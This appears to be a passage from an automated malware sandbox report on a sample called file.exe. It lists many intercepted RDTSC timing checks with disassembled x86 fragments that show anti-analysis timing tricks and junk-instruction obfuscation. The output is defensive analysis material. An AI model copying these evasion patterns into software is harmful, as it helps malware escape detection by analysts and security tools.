                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB549C second address: AB54AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F0BF8E3D566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB54AA second address: AB54AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB57D2 second address: AB57D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA51E second address: ABA523 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA69A second address: ABA6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA6A6 second address: ABA6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BF9145126h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c push esi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA88 second address: ABAA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA8C second address: ABAA90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA90 second address: ABAAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0BF8E3D572h 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAAAF second address: ABAACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0BF9145130h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB181 second address: ABB185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB185 second address: ABB1B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145137h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F0BF9145126h 0x00000014 jnc 00007F0BF9145126h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB340 second address: ABB344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB344 second address: ABB363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB363 second address: ABB36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB83B second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0BF9145139h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0BF9145126h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABB862 second address: ABB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA09B second address: ABA0D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F0BF9145126h 0x00000009 jmp 00007F0BF9145131h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0BF9145136h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA0D3 second address: ABA0D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABEC91 second address: ABECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F0BF9145134h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0BF9145135h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC227A second address: AC2294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D576h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC2294 second address: AC22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F0BF9145126h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007F0BF9145136h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22BF second address: AC22D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22D4 second address: AC22DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC22DA second address: AC22DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7ACC second address: AC7AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145134h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6AE3 second address: AC6AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D573h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6EED second address: AC6EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC6EF3 second address: AC6EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7148 second address: AC7151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7151 second address: AC7155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7155 second address: AC7162 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF9145126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7459 second address: AC7479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D576h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77B9 second address: AC77D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0BF9145126h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F0BF914512Fh 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77D8 second address: AC77E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F0BF8E3D566h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC77E4 second address: AC77EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACBB61 second address: ACBB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007F0BF8E3D56Eh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6BE second address: ACB6CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0BF9145126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6CA second address: ACB6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0BF8E3D570h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6E0 second address: ACB6F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF914512Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB6F2 second address: ACB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F0BF8E3D58Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007F0BF8E3D56Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE7F5 second address: ACE7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE7FA second address: ACE800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEB29 second address: ACEB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD359B second address: AD359F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD38BB second address: AD38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7288 second address: AD728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD73E7 second address: AD73EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD73EB second address: AD73F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD76EC second address: AD76F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD9AA second address: ADD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F0BF8E3D578h 0x0000000b jo 00007F0BF8E3D572h 0x00000011 jg 00007F0BF8E3D566h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC2BA second address: ADC2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F0BF9145126h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC2CB second address: ADC2D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC581 second address: ADC587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC587 second address: ADC5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D579h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC809 second address: ADC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC80D second address: ADC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC813 second address: ADC81D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0BF9145126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC81D second address: ADC821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADC821 second address: ADC827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81D55 second address: A81DBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0BF8E3D571h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 jp 00007F0BF8E3D568h 0x00000016 mov ebx, dword ptr [ebp+12472E76h] 0x0000001c mov dword ptr [ebp+122D2D9Ch], esi 0x00000022 add eax, ebx 0x00000024 mov ecx, dword ptr [ebp+122D1D24h] 0x0000002a push eax 0x0000002b jmp 00007F0BF8E3D56Dh 0x00000030 mov dword ptr [esp], eax 0x00000033 mov edx, dword ptr [ebp+122D27DCh] 0x00000039 push 00000004h 0x0000003b nop 0x0000003c push ebx 0x0000003d jmp 00007F0BF8E3D56Dh 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pop edi 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81DBD second address: A81DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81DC1 second address: A81DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC22 second address: ADCC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC26 second address: ADCC4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF8E3D566h 0x00000008 jmp 00007F0BF8E3D573h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007F0BF8E3D566h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC4E second address: ADCC71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0BF9145136h 0x0000000b jmp 00007F0BF9145130h 0x00000010 jnp 00007F0BF9145132h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADCC71 second address: ADCC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6BB second address: ADD6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6C1 second address: ADD6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A47FAE second address: A47FBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F0BF9145126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3431 second address: AE3435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3EFD second address: AE3F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3F01 second address: AE3F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jmp 00007F0BF8E3D573h 0x00000011 popad 0x00000012 push ebx 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE41E4 second address: AE41E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE44C3 second address: AE44C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4787 second address: AE478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8FBD second address: AE8FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F0BF8E3D56Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE943E second address: AE9444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9444 second address: AE947B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 jmp 00007F0BF8E3D579h 0x0000000c jc 00007F0BF8E3D566h 0x00000012 jl 00007F0BF8E3D566h 0x00000018 popad 0x00000019 ja 00007F0BF8E3D56Eh 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE95BE second address: AE95D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF914512Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE99D8 second address: AE99DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE99DD second address: AE99F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145130h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE805 second address: AEE80C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEFE0A second address: AEFE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BF9145126h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A13 second address: AF8A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D56Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A22 second address: AF8A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF914512Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF8A31 second address: AF8A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0BF8E3D577h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6AB5 second address: AF6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145138h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70B5 second address: AF70D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007F0BF8E3D56Eh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0BF8E3D56Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70D7 second address: AF70DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70DC second address: AF70E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF70E5 second address: AF70E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7387 second address: AF738D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF738D second address: AF73AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BF9145133h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF73AB second address: AF73AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF77B1 second address: AF77B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7964 second address: AF7974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D56Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF7974 second address: AF79AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F0BF9145126h 0x0000000e jo 00007F0BF9145126h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jmp 00007F0BF9145135h 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F0BF9145126h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF79AC second address: AF79B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF883A second address: AF8859 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BF9145126h 0x00000008 jmp 00007F0BF9145135h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
